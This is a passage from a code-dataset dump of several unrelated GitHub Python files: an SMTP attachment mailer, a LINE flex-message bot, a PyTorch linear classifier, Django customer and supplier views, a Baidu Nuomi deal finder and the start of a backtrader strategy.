' +\n '', 'html', 'utf-8'))\n\n# 首先是xlsx类型的附件\nxlsxpart = MIMEApplication(open('good.xlsx', 'rb').read())\nxlsxpart.add_header('Content-Disposition', 'attachment', filename='better.xlsx')\nmsg.attach(xlsxpart)\n\n# jpg类型的附件\njpgpart = MIMEApplication(open('o13.jpg', 'rb').read())\njpgpart.add_header('Content-Disposition', 'attachment', filename='new.jpg')\njpgpart.add_header('Content-ID', '<0>')\njpgpart.add_header('X-Attachment-Id', '0')\nmsg.attach(jpgpart)\n\n# mp3类型的附件\nmp3part = MIMEApplication(open('aa.txt', 'rb').read())\nmp3part.add_header('Content-Disposition', 'attachment', filename='news.txt')\nmsg.attach(mp3part)\n\n# jpg类型的附件\njpgpart1 = MIMEApplication(open('眼影新包装3.jpg', 'rb').read())\njpgpart1.add_header('Content-Disposition', 'attachment', filename='aaa.jpg')\njpgpart1.add_header('Content-ID', '<1>')\nmsg.attach(jpgpart1)\n\n\nserver = smtplib.SMTP(smtp_server, 25)\nserver.set_debuglevel(1)\nserver.login(from_addr, password)\nserver.sendmail(from_addr, to_addr.split(\",\"), msg.as_string())\nserver.quit()", "repo_name": "EragoGeneral/python-demo", "sub_path": "network/SMTP/email_mul_attachment.py", "file_name": "email_mul_attachment.py", "file_ext": "py", "file_size_in_byte": 2182, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "email.utils.parseaddr", "line_number": 14, "usage_type": "call"}, {"api_name": "email.utils.formataddr", "line_number": 15, "usage_type": "call"}, {"api_name": "email.header.Header", "line_number": 15, "usage_type": "call"}, {"api_name": "email.mime.multipart.MIMEMultipart", "line_number": 25, "usage_type": "call"}, {"api_name": "email.header.Header", "line_number": 29, "usage_type": "call"}, {"api_name": "email.mime.text.MIMEText", "line_number": 33, "usage_type": "call"}, {"api_name": "email.mime.application.MIMEApplication", "line_number": 38, "usage_type": "call"}, {"api_name": "email.mime.application.MIMEApplication", "line_number": 43, "usage_type": "call"}, {"api_name": "email.mime.application.MIMEApplication", "line_number": 50, "usage_type": "call"}, {"api_name": "email.mime.application.MIMEApplication", "line_number": 55, "usage_type": "call"}, {"api_name": "smtplib.SMTP", "line_number": 61, "usage_type": "call"}]}
+{"seq_id": "280710326", "text": "'''\nРћЈРћЂРћЂРћЂРћЂРћЂРћЂРћЂРћЂРћЂРћЂРћЂРћЂРћЂРћЂРћЂРћЂРћЂ\nРћБ љђђ H╬ъLLT╬ъRH╬ъ╬ЏD р┤ёр┤Ј╩ђр┤ў.\nРћБ ┬Е 2020 р┤Їр┤Ј-╩Ўр┤ђ╔┤р┤бр┤ю\nРћЌРћЂРћЂРћЂРћЂРћЂРћЂРћЂРћЂРћЂРћЂРћЂРћЂРћЂРћЂРћЂРћЂРћЂ\n'''\n\nfrom linepy import *\nfrom akad.ttypes import LiffChatContext, LiffContext, LiffSquareChatContext, LiffNoneContext, LiffViewRequest\nfrom template import Mobanzu\nimport requests, uvloop, json, threading, asyncio, livejson\n\nclient = LINE(\"EMAIL\", \"PASSWORD\") #USE_YOUR_EMAIL_AND_PASSWORD\nclient.log(\"Auth Token : \" + str(client.authToken))\n\npoll = OEPoll(client)\nmobflex = Mobanzu(client)\nloop = asyncio.get_event_loop()\n\ndef allow_liff():\n url = 'https://access.line.me/dialog/api/permissions'\n data = {'on': ['P', 'CM'], 'off': []}\n headers = {\n 'X-Line-Access': client.authToken,\n 'X-Line-Application': client.server.APP_NAME,\n 'X-Line-ChannelId': '1655425084',\n 'Content-Type': 'application/json'\n }\n requests.post(url, json=data, headers=headers)\n\ndef sendTemplate(to, data):\n drex = LiffChatContext(to)\n mobz = LiffContext(chat=drex)\n view = LiffViewRequest('1655425084-3OQ8Mn9J', mobz)\n token = client.liff.issueLiffView(view)\n url = 'https://api.line.me/message/v3/share'\n headers = {\n 'Content-Type': 'application/json',\n 'Authorization': 'Bearer %s' % token.accessToken\n }\n data = {\"messages\": [data]}\n requests.post(url, headers=headers, data=json.dumps(data))\n\ndef sendFlex(to, alt, flex):\n data = {\"type\": \"flex\", \"altText\": alt, \"contents\": flex}\n sendTemplate(to, data)\n\nasync def clientBot(op):\n try:\n if op.type == 0:\n# print(\"[ 0 ] END OF OPERATION\")\n return\n if op.type == 26:\n print(\"[ 26 ] RECEIVE MESSAGE\")\n msg = op.message\n text = msg.text\n id = msg.id\n to = msg.to\n receiver = msg.to\n sender = msg._from\n if msg.toType == 0 or msg.toType == 1 or msg.toType == 2:\n if msg.toType == 0:\n if sender != client.getProfile().mid: to = sender\n else: to = receiver\n if msg.toType == 1 or msg.toType == 2: to = msg.to\n if msg.contentType == 0:\n if None == msg.text: return\n cmd = msg.text.lower()\n if cmd == \"allowliff\":\n try: allow_liff(); client.sendReplyMessage(id, to, \"Access Granted For Flex Message.\")\n except: client.sendReplyMessage(id, to, \"line://app/LIFF_ID?type=text&text=Done\") #USE_YOUR_LIFF_ID\n try:\n if cmd == \"help\":\n contact = client.getContact(sender)\n name = contact.displayName\n status = contact.statusMessage if contact.statusMessage != '' else ' '\n try: picture = \"https://obs.line-scdn.net/\" + contact.pictureStatus\n except: picture = \"https://i.ibb.co/tczXyp1/hlth-Img-Not-Found.jpg\"\n sendFlex(to, \"Help Menu\", mobflex.helpMenu(picture, name, status))\n if cmd == \"profile\": sendFlex(to, \"Profile Menu\", mobflex.profileMenu())\n if cmd == \"group\": sendFlex(to, \"Group Menu\", mobflex.groupMenu())\n if cmd == \"media\": sendFlex(to, \"Media Menu\", mobflex.mediaMenu())\n if cmd == \"service\": sendFlex(to, \"Service Menu\", mobflex.serviceMenu())\n if cmd == \"system\": sendFlex(to, \"System Menu\", mobflex.systemMenu())\n if cmd == \"forum\": sendFlex(to, \"Forum Menu\", mobflex.forumMenu())\n except: client.sendReplyMessage(id, to, \"Access LIFF Required\\nPlease Type 'Allowliff' First.\")\n except Exception as error: print(error)\n\ndef run():\n while True:\n try:\n ops = poll.singleTrace(count=50)\n if ops != None:\n for op in ops:\n loop.run_until_complete(clientBot(op))\n poll.setRevision(op.revision)\n except Exception as error: print(error)\n\nif __name__ == \"__main__\":\n run()\n", "repo_name": "Mobanzu/mobflex", "sub_path": "sample.py", "file_name": "sample.py", "file_ext": "py", "file_size_in_byte": 4248, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 13, "dataset": "github-code", "pt": "31", "api": [{"api_name": "template.Mobanzu", "line_number": 17, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 18, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 29, "usage_type": "call"}, {"api_name": "akad.ttypes.LiffChatContext", "line_number": 32, "usage_type": "call"}, {"api_name": "akad.ttypes.LiffContext", "line_number": 33, "usage_type": "call"}, {"api_name": "akad.ttypes.LiffViewRequest", "line_number": 34, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 42, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 42, "usage_type": "call"}]}
+{"seq_id": "11411593997", "text": "import numpy as np\nimport matplotlib.pyplot as plt\n\nRECORD_TIME = 0.2\nRATE = 44100\nCHUNK = RATE/30\n\nstorage = np.load('Data.npy')\n#for i in range(100):\n# print(storage[i])\nplt.figure(1)\nplt.plot(storage)\n#plt.plot((np.arange(storage.size/2)*(CHUNK/(RATE*RECORD_TIME))),storage)\nplt.show()\n", "repo_name": "mdasil44/CapstoneRaspberryPiCode", "sub_path": "Plot.py", "file_name": "Plot.py", "file_ext": "py", "file_size_in_byte": 292, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.load", "line_number": 8, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 11, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}]}
+{"seq_id": "11903818182", "text": "from dlvc.datasets.pets import PetsDataset\nfrom dlvc.dataset import Subset\nfrom dlvc.batches import BatchGenerator\nfrom dlvc.test import Accuracy\nimport dlvc.ops as ops\nimport numpy as np\nimport torch\n\n\n# TODO: Define the network architecture of your linear classifier.\nclass LinearClassifier(torch.nn.Module):\n def __init__(self, input_dim, num_classes):\n super(LinearClassifier, self).__init__()\n\n self.input_dim = input_dim\n self.num_classes = num_classes\n\n # define network layer\n self.layer = torch.nn.Linear(self.input_dim, self.num_classes)\n\n def forward(self, x):\n return self.layer(x)\n\n\nop = ops.chain([\n ops.vectorize(),\n ops.type_cast(np.float32),\n ops.add(-127.5),\n ops.mul(1 / 127.5),\n])\n\n\ndef train_model(linear_classifier, criterion, optimizer, epochs, train_data, valid_data):\n acc = Accuracy()\n print(\"Train the network\")\n best_acc = 0.0\n for epoch in range(epochs):\n running_loss = 0.0\n acc.reset()\n for data in train_data:\n # get the inputs and the labels\n inputs = data.data\n labels = data.label\n\n # convert the np.array in tensor\n t_inputs = torch.tensor(inputs)\n t_labels = torch.tensor(labels).to(torch.long) #cast labels to long so the CE works (CE throws exception with int)\n\n # zero the parameter gradients, for every batch I must compute the gradient again\n optimizer.zero_grad()\n\n # forward step\n output = linear_classifier.forward(t_inputs)\n loss = criterion(output, t_labels)\n loss.backward() # compute the gradients\n optimizer.step() # update the parameter\n\n # print statistics\n running_loss += loss.item()\n acc.update(linear_classifier.forward(torch.tensor(valid_data.data)).detach().numpy(), valid_data.label)\n print(f\"epoch {epoch + 1} \\ntrain loss: {running_loss}\\nval accuracy: {acc.accuracy()}\")\n\n # update the values\n running_loss = 0.0\n if acc.accuracy() >= best_acc:\n best_acc = acc.accuracy()\n\n acc.reset()\n print(\"Finished Training\")\n return linear_classifier, best_acc\n\n\ndef main():\n fp = 'C:/Users/admin/Desktop/10. Semester/Computer Vision/dlvc_ss22/assignments/reference/cifar10'\n\n print(\"Load data\")\n train_ds = PetsDataset(fp, Subset.TRAINING)\n valid_ds = PetsDataset(fp, Subset.VALIDATION)\n test_ds = PetsDataset(fp, Subset.TEST)\n print(\"Data Loaded\")\n\n print(\"Creating Batch Generator\")\n train = BatchGenerator(train_ds, len(train_ds), False, op)\n valid = next(iter(BatchGenerator(valid_ds, len(valid_ds), False, op)))\n test = next(iter(BatchGenerator(test_ds, len(test_ds), False, op)))\n print(\"Batch Generator created\")\n\n #define general parameters\n in_features = 3072 # size of the vector in input\n epochs = 100\n\n #Test 1\n print(\"Create Linear Classifier, Loss Function and Optimizer\")\n lc = LinearClassifier(in_features, train_ds.num_classes())\n criterion = torch.nn.CrossEntropyLoss()\n optimizer = torch.optim.SGD(lc.parameters(), lr=0.001, momentum=0.9)\n\n lc_test_1, best_acc_test1 = train_model(lc, criterion, optimizer, epochs, train, valid)\n\n #Test 2, change the optimizer\n print(\"------------------------------------\")\n lc = LinearClassifier(in_features, train_ds.num_classes())\n optimizer = torch.optim.Adam(lc.parameters(), lr=0.001)\n lc_test_2, best_acc_test2 = train_model(lc, criterion, optimizer, epochs, train, valid)\n\n #find the best model\n if best_acc_test1 > best_acc_test2:\n lc = lc_test_1\n best_acc = best_acc_test1\n else:\n lc = lc_test_2\n best_acc = best_acc_test2\n\n print(\"--------------------\")\n print(f\"val accuracy (best): {best_acc}\")\n\n # compute the test accuracy\n test_acc = Accuracy()\n test_acc.update(lc.forward(torch.tensor(test.data)).detach().numpy(), test.label)\n print(f\"test accuracy: {test_acc.accuracy()}\")\n\n\nmain()", "repo_name": "onliner98/dlvc_ss22", "sub_path": "assignments/reference/linear_cats_and_dogs.py", "file_name": "linear_cats_and_dogs.py", "file_ext": "py", "file_size_in_byte": 4083, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "torch.nn", "line_number": 11, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 19, "usage_type": "attribute"}, {"api_name": "dlvc.ops.chain", "line_number": 25, "usage_type": "call"}, {"api_name": "dlvc.ops", "line_number": 25, "usage_type": "name"}, {"api_name": "dlvc.ops.vectorize", "line_number": 26, "usage_type": "call"}, {"api_name": "dlvc.ops", "line_number": 26, "usage_type": "name"}, {"api_name": "dlvc.ops.type_cast", "line_number": 27, "usage_type": "call"}, {"api_name": "dlvc.ops", "line_number": 27, "usage_type": "name"}, {"api_name": "numpy.float32", "line_number": 27, "usage_type": "attribute"}, {"api_name": "dlvc.ops.add", "line_number": 28, "usage_type": "call"}, {"api_name": "dlvc.ops", "line_number": 28, "usage_type": "name"}, {"api_name": "dlvc.ops.mul", "line_number": 29, "usage_type": "call"}, {"api_name": "dlvc.ops", "line_number": 29, "usage_type": "name"}, {"api_name": "dlvc.test.Accuracy", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 47, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 60, "usage_type": "call"}, {"api_name": "dlvc.datasets.pets.PetsDataset", "line_number": 77, "usage_type": "call"}, {"api_name": "dlvc.dataset.Subset.TRAINING", "line_number": 77, "usage_type": "attribute"}, {"api_name": "dlvc.dataset.Subset", "line_number": 77, "usage_type": "name"}, {"api_name": "dlvc.datasets.pets.PetsDataset", "line_number": 78, "usage_type": "call"}, {"api_name": "dlvc.dataset.Subset.VALIDATION", "line_number": 78, "usage_type": "attribute"}, {"api_name": "dlvc.dataset.Subset", "line_number": 78, "usage_type": "name"}, {"api_name": "dlvc.datasets.pets.PetsDataset", "line_number": 79, "usage_type": "call"}, {"api_name": "dlvc.dataset.Subset.TEST", "line_number": 79, "usage_type": "attribute"}, {"api_name": "dlvc.dataset.Subset", "line_number": 79, "usage_type": "name"}, {"api_name": "dlvc.batches.BatchGenerator", "line_number": 83, "usage_type": "call"}, {"api_name": "dlvc.batches.BatchGenerator", "line_number": 84, "usage_type": "call"}, {"api_name": "dlvc.batches.BatchGenerator", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 95, "usage_type": "attribute"}, {"api_name": "torch.optim.SGD", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 96, "usage_type": "attribute"}, {"api_name": "torch.optim.Adam", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 103, "usage_type": "attribute"}, {"api_name": "dlvc.test.Accuracy", "line_number": 118, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 119, "usage_type": "call"}]}
+{"seq_id": "31828903725", "text": "import argparse\nfrom db_session import insert_object, get_user_id\nfrom db_model import User\nimport datetime\nimport os\n\nFOLDER_CURR = os.path.dirname(os.path.abspath(__file__))\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--id\", type=str,\n\thelp=\"id of user\")\nap.add_argument(\"-n\", \"--name\", type=str,\n\thelp=\"name of user\")\n\nargs = vars(ap.parse_args())\nid = args[\"id\"]\nname = args[\"name\"]\nrecords = get_user_id(name)\nif len(records) > 0:\n print('user is exist!')\nelse:\n folder = os.path.join(FOLDER_CURR, '..', 'datasets')\n path = os.path.join(folder, name)\n avatar = '/images/avatar/{0}/0.jpg'.format(name)\n if not os.path.isdir(path):\n os.mkdir(path)\n user = User(face_id=id, password=id, date_created = str(datetime.datetime.now()), level=1, fullname=name, avatar= avatar)\n insert_object(user)", "repo_name": "tuanvnext/face_recognize", "sub_path": "src/backend/user.py", "file_name": "user.py", "file_ext": "py", "file_size_in_byte": 832, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.path.dirname", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 7, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 8, "usage_type": "call"}, {"api_name": "db_session.get_user_id", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 25, "usage_type": "call"}, {"api_name": "db_model.User", "line_number": 26, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 26, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 26, "usage_type": "attribute"}, {"api_name": "db_session.insert_object", "line_number": 27, "usage_type": "call"}]}
+{"seq_id": "6069773247", "text": "from models import *\nfrom forms import *\nfrom inventory.models import BatchLoad\nfrom sales.models import *\nfrom common.views import DecimalEncoder\n\nfrom django.shortcuts import render_to_response, get_object_or_404, redirect\nfrom django.core import serializers\nfrom django.utils import simplejson\nfrom django.db.models import Q\nfrom django.http import HttpResponse\nfrom urllib import unquote\n\ndef get_name_query(term):\n words = term.split(\" \")\n if len(words) > 1:\n words = filter(lambda x: None or x.strip(), words)\n word_query = Q()\n for word in words:\n word_query &= Q(name__istartswith = word) | Q(name__icontains = \" \" + word)\n return word_query\n\n#\n# FORNITORI\n#\n\ndef find_supplier(request):\n if request.is_ajax():\n term = unquote(request.GET[\"term\"])\n name_query = get_name_query(term)\n matches = Supplier.objects.filter(name_query)\n result_list = []\n for supp in matches:\n result_list.append(supp.to_dict())\n if len(result_list) == 1:\n result_list[0][\"perfect_match\"] = True\n return HttpResponse(simplejson.dumps(result_list, cls=DecimalEncoder), 'application/javascript')\n else:\n return render_to_response('suppliers/find.html')\n\ndef add_supplier(request):\n if request.method == 'POST':\n form = SupplierForm(request.POST)\n if form.is_valid():\n new_supplier = form.save()\n if request.is_ajax():\n return render_to_response('suppliers/ajax_add.html')\n else:\n return redirect(show_supplier, new_supplier.id)\n else:\n form = SupplierForm()\n return render_to_response('suppliers/%sadd.html' % (request.is_ajax() and 'ajax_' or ''), {'form': form})\n\ndef show_supplier(request, id):\n supplier = get_object_or_404(Supplier, pk=id)\n return render_to_response('suppliers/show.html', {'supplier': supplier})\n\n#---- children of the show_supplier view\n\ndef supplier_info_tab(request, id):\n supplier = get_object_or_404(Supplier, pk=id)\n bad_request = False\n if request.method == \"POST\":\n form = SupplierForm(request.POST, instance = supplier)\n if form.is_valid():\n form.save()\n else:\n bad_request = True\n else:\n form = SupplierForm(instance = supplier)\n response = render_to_response('suppliers/tabs/info.html', {'form': form, 'supplier': supplier})\n if bad_request:\n response.status_code = 400\n return response\n\ndef supplier_history_tab(request, supplier_id):\n supplier = get_object_or_404(Supplier, pk=supplier_id)\n batchloads = BatchLoad.objects.filter(supplier = supplier, loaded = True).order_by(\"-date\")\n return render_to_response('suppliers/tabs/history.html', {'supplier': supplier, 'batchloads': batchloads})\n\n\n#\n# CLIENTI\n#\n\ndef find_customer(request):\n if request.is_ajax():\n term = unquote(request.GET[\"term\"])\n name_query = get_name_query(term)\n matches = Customer.objects.filter(name_query)\n result_list = []\n for cust in matches:\n result_list.append(cust.to_dict())\n if len(result_list) == 1:\n result_list[0][\"perfect_match\"] = True\n return HttpResponse(simplejson.dumps(result_list, cls=DecimalEncoder), 'application/javascript')\n else:\n return render_to_response('customers/find.html')\n\ndef add_customer(request):\n status = 200\n if request.is_ajax():\n Form = CustomerQuickForm\n else:\n Form = CustomerForm\n if request.method == 'POST':\n form = Form(request.POST)\n if form.is_valid():\n new_customer = form.save()\n if request.is_ajax():\n return HttpResponse(simplejson.dumps(new_customer.to_dict(), cls=DecimalEncoder), 'application/javascript')\n return redirect(show_customer, new_customer.id)\n else:\n status = 400\n else:\n form = Form()\n\n if request.is_ajax():\n response = render_to_response('customers/ajax_add.html', {'form': form})\n response.status_code = status\n return response\n else:\n return render_to_response('customers/add.html', {'form': form})\n\ndef add_company(request, pa=False):\n status = 200\n if request.is_ajax():\n Form = pa and PAQuickForm or CompanyQuickForm\n else:\n Form = pa and PAForm or CompanyForm\n if request.method == 'POST':\n form = Form(request.POST)\n if form.is_valid():\n new_company = form.save()\n if request.is_ajax():\n return HttpResponse(simplejson.dumps(new_company.to_dict(), cls=DecimalEncoder), 'application/javascript')\n return redirect(show_customer, new_company.id)\n else:\n status = 400\n else:\n form = Form()\n\n if request.is_ajax():\n response = render_to_response('customers/ajax_add_company.html', {'form': form, 'pa': pa})\n response.status_code = status\n return response\n else:\n return render_to_response('customers/add.html', {'form': form})\n\n\n\ndef show_customer(request, id):\n customer = get_object_or_404(Customer, pk=id)\n try:\n if customer.companycustomer:\n customer.company = customer.companycustomer\n except:\n pass\n return render_to_response('customers/show.html', {'customer': customer})\n\n\n#---- children of the show_customer view\n\ndef customer_info_tab(request, id):\n customer = get_object_or_404(Customer, pk=id)\n bad_request = False\n customer = customer.child()\n if customer.__class__ == PACustomer:\n Form = PAInfoForm\n elif customer.__class__ == CompanyCustomer:\n Form = CompanyInfoForm\n else:\n Form = CustomerInfoForm\n\n if request.method == \"POST\":\n form = Form(request.POST, instance = customer)\n if form.is_valid():\n form.save()\n else:\n bad_request = True\n else:\n form = Form(instance = customer)\n response = render_to_response('customers/tabs/info.html', {'form': form, 'customer': customer})\n if bad_request:\n response.status_code = 400\n return response\n\ndef customer_commercial_tab(request, id):\n customer = get_object_or_404(Customer, pk=id)\n bad_request = False\n try:\n customer = customer.companycustomer\n company = True\n except:\n company = False\n if company:\n Form = CompanyCommercialForm\n else:\n Form = CustomerCommercialForm\n\n if request.method == \"POST\":\n form = Form(request.POST, instance = customer)\n if form.is_valid():\n form.save()\n else:\n bad_request = True\n else:\n form = Form(instance = customer)\n response = render_to_response('customers/tabs/commercial.html', {'form': form, 'customer': customer})\n if bad_request:\n response.status_code = 400\n return response\n\ndef customer_history_tab(request, customer_id):\n customer = get_object_or_404(Customer, pk=customer_id)\n carts = Cart.objects.filter(customer = customer, receipt__isnull = False)\n receipts = Receipt.objects.filter(cart__in = carts)\n list = []\n for r in receipts:\n list.append(r.child())\n return render_to_response('customers/tabs/history.html', {'customer': customer.child(), 'receipts': list})\n", "repo_name": "marcor/silversly", "sub_path": "people/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 7323, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.db.models.Q", "line_number": 18, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 20, "usage_type": "call"}, {"api_name": "urllib.unquote", "line_number": 29, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 37, "usage_type": "call"}, {"api_name": "django.utils.simplejson.dumps", "line_number": 37, "usage_type": "call"}, {"api_name": "django.utils.simplejson", "line_number": 37, "usage_type": "name"}, {"api_name": "common.views.DecimalEncoder", "line_number": 37, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 39, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 47, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 49, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 52, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 55, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 56, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 61, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 71, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 77, "usage_type": "call"}, {"api_name": "inventory.models.BatchLoad.objects.filter", "line_number": 78, "usage_type": "call"}, {"api_name": "inventory.models.BatchLoad.objects", "line_number": 78, "usage_type": "attribute"}, {"api_name": "inventory.models.BatchLoad", "line_number": 78, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 79, "usage_type": "call"}, {"api_name": "urllib.unquote", "line_number": 88, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 96, "usage_type": "call"}, {"api_name": "django.utils.simplejson.dumps", "line_number": 96, "usage_type": "call"}, {"api_name": "django.utils.simplejson", "line_number": 96, "usage_type": "name"}, {"api_name": "common.views.DecimalEncoder", "line_number": 96, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 98, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 111, "usage_type": "call"}, {"api_name": "django.utils.simplejson.dumps", "line_number": 111, "usage_type": "call"}, {"api_name": "django.utils.simplejson", "line_number": 111, "usage_type": "name"}, {"api_name": "common.views.DecimalEncoder", "line_number": 111, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 112, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 119, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 123, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 136, "usage_type": "call"}, {"api_name": "django.utils.simplejson.dumps", "line_number": 136, "usage_type": "call"}, {"api_name": "django.utils.simplejson", "line_number": 136, "usage_type": "name"}, {"api_name": "common.views.DecimalEncoder", "line_number": 136, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 137, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 144, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 148, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 153, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 159, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 165, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 183, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 189, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 209, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 215, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 221, "usage_type": "call"}]}
+{"seq_id": "20979359181", "text": "# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nimport random\nimport requests\n\n\ndef get_city_id(city_name):\n '''获取城市的id,为后边的做准备'''\n city_url = 'http://apis.baidu.com/baidunuomi/openapi/cities'\n headers = {'apikey': '14cdd85738c717e546a5b6852c3e1631'}\n\n r = requests.get(city_url, headers=headers)\n cities = r.json()['cities']\n for city in cities:\n # 注意此处没有使用`==`,而是使用了`in`\n if city_name in city['city_name']:\n return city['city_id']\n # 如果找到输入的城市,则返回城市的id,如果没找到,就退出\n print('city not found')\n assert 0\n\n\ndef get_shops_list(city_id, keyword, location):\n shops_url = 'http://apis.baidu.com/baidunuomi/openapi/searchshops'\n headers = {'apikey': '14cdd85738c717e546a5b6852c3e1631'}\n payload = {'city_id': city_id, 'location': location,\n 'keyword': keyword, 'sort': 4}\n ''' 获取给定关键词搜索到的店铺的名称,并按照销量排序,\n 此处输入了位置信息,输入自己所在的坐标即返回自己附近的餐馆\n 还有很多可选参数,请参考:\n http://apistore.baidu.com/apiworks/servicedetail/508.html\n '''\n r = requests.get(shops_url, params=payload, headers=headers)\n return r.json()['data']['shops']\n\n\ndef get_all_deals(shop_list):\n deal_list = []\n for shop in shop_list:\n for deal in shop['deals']:\n deal_list.append([deal['title'],\n deal['description'],\n deal['promotion_price'] / 100,\n deal['score']])\n # 在一大堆信息中,我们只选取了餐馆的名字、描述、价格和评分\n return deal_list\n\nif __name__ == '__main__':\n city_id = get_city_id('南京')\n shop_list = get_shops_list(city_id, '黄焖鸡', '32.0219605,118.7987918')\n deal_list = get_all_deals(shop_list)\n # 搜索南京市给定位置附近销量大的黄焖鸡\n print(random.choice(deal_list))\n # 随机选一个团购单下单吧!\n", "repo_name": "crossin/py-practice", "sub_path": "src/nuomi/nuomi.py", "file_name": "nuomi.py", "file_ext": "py", "file_size_in_byte": 2195, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "requests.get", "line_number": 16, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 37, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 57, "usage_type": "call"}]}
+{"seq_id": "9045733696", "text": "# pip install backtrader pandas\r\n# https://finance.yahoo.com/quote/GAZP.ME/history?p=GAZP.ME\r\n\r\nfrom __future__ import (absolute_import, division, print_function,\r\n unicode_literals)\r\n\r\nimport backtrader as bt\r\nimport pandas as pd\r\nimport datetime # For datetime objects\r\nimport os.path # To manage paths\r\nimport sys # To find out the script name (in argv[0])\r\n\r\n\r\n# Create a Stratey\r\nclass TestStrategy(bt.Strategy):\r\n\r\n def log(self, txt, dt=None):\r\n ''' Logging function fot this strategy'''\r\n dt = dt or self.datas[0].datetime.date(0)\r\n print('%s, %s' % (dt.isoformat(), txt))\r\n\r\n def __init__(self):\r\n # Keep a reference to the \"close\" line in the data[0] dataseries\r\n self.dataclose = self.datas[0].close\r\n\r\n # To keep track of pending orders\r\n self.order = None\r\n\r\n def notify_order(self, order):\r\n if order.status in [order.Submitted, order.Accepted]:\r\n # Buy/Sell order submitted/accepted to/by broker - Nothing to do\r\n 